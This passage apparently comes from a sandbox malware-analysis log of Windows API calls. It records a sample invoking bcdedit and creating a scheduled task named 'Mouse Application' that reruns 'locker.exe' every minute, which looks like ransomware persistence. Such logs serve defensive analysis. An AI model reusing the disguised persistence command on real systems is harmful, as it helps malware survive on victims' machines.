0xffffffff [0161.914] GetLastError () returned 0x2 [0161.914] ??_V@YAXPAX@Z () returned 0x1 [0161.914] _get_osfhandle (_FileHandle=2) returned 0x94 [0161.914] GetFileType (hFile=0x94) returned 0x2 [0161.914] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0161.914] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x6ff50c | out: lpMode=0x6ff50c) returned 1 [0162.031] _get_osfhandle (_FileHandle=2) returned 0x94 [0162.031] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x94, lpConsoleScreenBufferInfo=0x6ff55c | out: lpConsoleScreenBufferInfo=0x6ff55c) returned 1 [0162.059] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xf7b990, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0162.060] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xf7b990, nSize=0x2000, Arguments=0x6ff58c | out: lpBuffer="'bcdedit.exe' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x66 [0162.060] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0xf7b990*, nNumberOfCharsToWrite=0x66, lpNumberOfCharsWritten=0x6ff540, lpReserved=0x0 | out: lpBuffer=0xf7b990*, lpNumberOfCharsWritten=0x6ff540*=0x66) returned 1 [0162.100] ??_V@YAXPAX@Z () returned 0x1 [0162.100] GetConsoleTitleW (in: lpConsoleTitle=0x6ffa50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0162.135] malloc (_Size=0xffce) returned 0xbb2700 [0162.136] ??_V@YAXPAX@Z () returned 0x6ff7dc [0162.136] malloc (_Size=0xffce) returned 0xbc26d8 [0162.136] ??_V@YAXPAX@Z () returned 0x6ff594 [0162.136] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\bcdedit.exe")) returned 0xffffffff [0162.136] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0162.136] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0162.136] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0162.136] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0162.136] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0162.136] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0162.136] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0162.136] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0162.136] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0162.136] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0162.136] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0162.136] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0162.136] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0162.136] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0162.136] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0162.136] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0162.136] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0162.136] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0162.136] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0162.136] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0162.137] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0162.137] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0162.137] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0162.137] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0162.137] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0162.137] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0162.137] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0162.137] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0162.137] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0162.137] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0162.137] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0162.137] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0162.137] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0162.137] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0162.137] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0162.137] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0162.137] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0162.137] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0162.137] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0162.137] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0162.137] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0162.137] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0162.137] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0162.137] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0162.137] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0162.137] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0162.137] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0162.137] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0162.137] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0162.137] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0162.137] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0162.137] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0162.137] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0162.137] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0162.137] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0162.138] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0162.138] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0162.138] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0162.138] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0162.138] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0162.138] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0162.138] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0162.138] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0162.138] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0162.138] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0162.138] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0162.138] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0162.138] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0162.138] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0162.138] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0162.138] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0162.138] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0162.138] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0162.138] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0162.138] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0162.138] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0162.138] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0162.138] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0162.138] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0162.138] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0162.138] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0162.138] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0162.138] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0162.138] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0162.138] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0162.138] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0162.138] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0162.138] ??_V@YAXPAX@Z () returned 0x1 [0162.139] GetProcessHeap () returned 0xaa0000 [0162.139] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xffd6) returned 0xad9ac8 [0162.139] GetProcessHeap () returned 0xaa0000 [0162.139] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x6a) returned 0xaa14f0 [0162.139] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0162.139] malloc (_Size=0xffce) returned 0xbc26d8 [0162.139] ??_V@YAXPAX@Z () returned 0x6ff314 [0162.139] GetProcessHeap () returned 0xaa0000 [0162.139] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x1ffa4) returned 0xae9aa8 [0162.141] SetErrorMode (uMode=0x0) returned 0x0 [0162.141] SetErrorMode (uMode=0x1) returned 0x0 [0162.141] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0xae9ab0, lpFilePart=0x6ff334 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x6ff334*="Desktop") returned 0x17 [0162.141] SetErrorMode (uMode=0x0) returned 0x1 [0162.141] GetProcessHeap () returned 0xaa0000 [0162.141] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xae9aa8, Size=0x50) returned 0xae9aa8 [0162.141] GetProcessHeap () returned 0xaa0000 [0162.141] RtlSizeHeap (HeapHandle=0xaa0000, Flags=0x0, MemoryPointer=0xae9aa8) returned 0x50 [0162.141] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0162.141] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0162.141] GetProcessHeap () returned 0xaa0000 [0162.141] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x1b4) returned 0xaa7668 [0162.141] GetProcessHeap () returned 0xaa0000 [0162.141] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0x360) returned 0xaa83a0 [0162.141] GetProcessHeap () returned 0xaa0000 [0162.141] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xaa83a0, Size=0x1b6) returned 0xaa83a0 [0162.141] GetProcessHeap () returned 0xaa0000 [0162.141] RtlSizeHeap (HeapHandle=0xaa0000, Flags=0x0, MemoryPointer=0xaa83a0) returned 0x1b6 [0162.141] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf6f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.141] GetProcessHeap () returned 0xaa0000 [0162.141] RtlAllocateHeap (HeapHandle=0xaa0000, Flags=0x8, Size=0xe0) returned 0xaa8560 [0162.141] GetProcessHeap () returned 0xaa0000 [0162.141] RtlReAllocateHeap (Heap=0xaa0000, Flags=0x0, Ptr=0xaa8560, Size=0x76) returned 0xaa8560 [0162.141] GetProcessHeap () returned 0xaa0000 [0162.141] RtlSizeHeap (HeapHandle=0xaa0000, Flags=0x0, MemoryPointer=0xaa8560) returned 0x76 [0162.141] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.142] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0162.142] GetLastError () returned 0x2 [0162.142] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0162.142] GetLastError () returned 0x2 [0162.142] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.142] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0162.142] GetLastError () returned 0x2 [0162.142] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0162.142] GetLastError () returned 0x2 [0162.143] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.143] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0162.143] GetLastError () returned 0x2 [0162.143] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0162.143] GetLastError () returned 0x2 [0162.143] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.143] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0162.143] GetLastError () returned 0x2 [0162.143] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0162.143] GetLastError () returned 0x2 [0162.143] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.144] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0162.144] GetLastError () returned 0x2 [0162.144] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0162.144] GetLastError () returned 0x2 [0162.144] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.144] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0162.146] GetLastError () returned 0x2 [0162.146] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0162.147] GetLastError () returned 0x2 [0162.147] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.148] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\bcdedit.exe", fInfoLevelId=0x1, lpFindFileData=0x6ff0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0e0) returned 0xffffffff [0162.148] GetLastError () returned 0x2 [0162.148] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps\\bcdedit.exe.*", fInfoLevelId=0x1, lpFindFileData=0x6ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ff0c0) returned 0xffffffff [0162.148] GetLastError () returned 0x2 [0162.148] ??_V@YAXPAX@Z () returned 0x1 [0162.148] _get_osfhandle (_FileHandle=2) returned 0x94 [0162.148] GetFileType (hFile=0x94) returned 0x2 [0162.148] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0162.148] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x6ff50c | out: lpMode=0x6ff50c) returned 1 [0162.203] _get_osfhandle (_FileHandle=2) returned 0x94 [0162.203] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x94, lpConsoleScreenBufferInfo=0x6ff55c | out: lpConsoleScreenBufferInfo=0x6ff55c) returned 1 [0162.259] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xf7b990, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0162.259] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0xf7b990, nSize=0x2000, Arguments=0x6ff58c | out: lpBuffer="'bcdedit.exe' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x66 [0162.260] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0xf7b990*, nNumberOfCharsToWrite=0x66, lpNumberOfCharsWritten=0x6ff540, lpReserved=0x0 | out: lpBuffer=0xf7b990*, lpNumberOfCharsWritten=0x6ff540*=0x66) returned 1 [0162.519] ??_V@YAXPAX@Z () returned 0x1 [0162.519] _get_osfhandle (_FileHandle=1) returned 0x90 [0162.519] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0162.543] _get_osfhandle (_FileHandle=1) returned 0x90 [0162.544] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xf73890 | out: lpMode=0xf73890) returned 1 [0162.578] _get_osfhandle (_FileHandle=1) returned 0x90 [0162.578] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0162.696] _get_osfhandle (_FileHandle=0) returned 0x8c [0162.696] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf73894 | out: lpMode=0xf73894) returned 1 [0162.765] _get_osfhandle (_FileHandle=0) returned 0x8c [0162.765] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0162.840] SetConsoleInputExeNameW () returned 0x1 [0162.840] GetConsoleOutputCP () returned 0x1b5 [0162.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf73850 | out: lpCPInfo=0xf73850) returned 1 [0162.903] SetThreadUILanguage (LangId=0x0) returned 0x500409 [0162.933] exit (_Code=1) [0162.933] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 33 os_tid = 0xd08 Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xb5d3000" os_pid = "0xf80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xf74" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 28 os_tid = 0x1220 Thread: id = 29 os_tid = 0x12bc Thread: id = 30 os_tid = 0x12c0 Thread: id = 31 os_tid = 0xffc Thread: id = 32 os_tid = 0xcd4 Process: id = "7" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0xf0c8000" os_pid = "0x680" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x53c" cmd_line = "schtasks /Create /SC MINUTE /TN \"Mouse Application\" /TR \"C:\\Users\\FD1HVy\\Desktop\\locker.exe\" /f" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 34 os_tid = 0x774 [0112.803] GetModuleHandleA (lpModuleName=0x0) returned 0xf30000 [0112.803] __set_app_type (_Type=0x1) [0112.803] __p__fmode () returned 0x776f3c14 [0112.803] __p__commode () returned 0x776f49ec [0112.804] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf4fdd0) returned 0x0 [0112.804] __wgetmainargs (in: _Argc=0xf59de8, _Argv=0xf59dec, _Env=0xf59df0, _DoWildCard=0, _StartInfo=0xf59dfc | out: _Argc=0xf59de8, _Argv=0xf59dec, _Env=0xf59df0) returned 0 [0112.804] _onexit (_Func=0xf51e50) returned 0xf51e50 [0112.805] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0112.805] WinSqmIsOptedIn () returned 0x0 [0112.805] GetProcessHeap () returned 0x3300000 [0112.805] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x3307cc0 [0112.805] RtlRestoreLastWin32Error () returned 0x3163000 [0112.805] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0112.805] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0112.805] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0112.805] RtlVerifyVersionInfo (VersionInfo=0xd2f568, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0112.805] GetProcessHeap () returned 0x3300000 [0112.805] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x3307db0 [0112.806] lstrlenW (lpString="") returned 0 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x2) returned 0x330bb28 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x3304ad0 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x3307c78 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x3304ce8 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x3308350 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330cfd0 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330ce70 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x3307dc8 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330cf90 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330ceb0 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d030 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d0b0 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x3307ca8 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d070 [0112.806] GetProcessHeap () returned 0x3300000 [0112.806] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330cfb0 [0112.807] GetProcessHeap () returned 0x3300000 [0112.807] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d170 [0112.807] GetProcessHeap () returned 0x3300000 [0112.807] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d090 [0112.807] SetThreadUILanguage (LangId=0x0) returned 0x3160409 [0113.322] RtlRestoreLastWin32Error () returned 0x3163000 [0113.322] GetProcessHeap () returned 0x3300000 [0113.322] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330ce90 [0113.322] GetProcessHeap () returned 0x3300000 [0113.322] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d0d0 [0113.322] GetProcessHeap () returned 0x3300000 [0113.322] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330d0f0 [0113.322] GetProcessHeap () returned 0x3300000 [0113.322] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330ced0 [0113.322] GetProcessHeap () returned 0x3300000 [0113.322] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x14) returned 0x330cef0 [0113.322] GetProcessHeap () returned 0x3300000 [0113.322] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x10) returned 0x3307de0 [0113.322] _memicmp (_Buf1=0x3307de0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.322] GetProcessHeap () returned 0x3300000 [0113.322] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x208) returned 0x330d230 [0113.322] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x330d230, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0113.323] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\WINDOWS\\SysWOW64\\schtasks.exe", lpdwHandle=0xd2f674 | out: lpdwHandle=0xd2f674) returned 0x75c [0113.324] GetProcessHeap () returned 0x3300000 [0113.324] RtlAllocateHeap (HeapHandle=0x3300000, Flags=0xc, Size=0x766) returned 0x330f138 [0113.324] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\WINDOWS\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x766, lpData=0x330f138 | out: lpData=0x330f138) returned 1 [0113.324] VerQueryValueW (in: pBlock=0x330f138, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xd2f67c, puLen=0xd2f680 | out: lplpBuffer=0xd2f67c*=0x330f4e0, puLen=0xd2f680) returned 1 [0113.326] _memicmp (_Buf1=0x3307de0, _Buf2=0xf328b8, _Size=0x7) returned 0 [0113.326] _vsnwprintf (in: _Buffer=0x330d230, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xd2f660 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0113.327] VerQueryValueW (in: 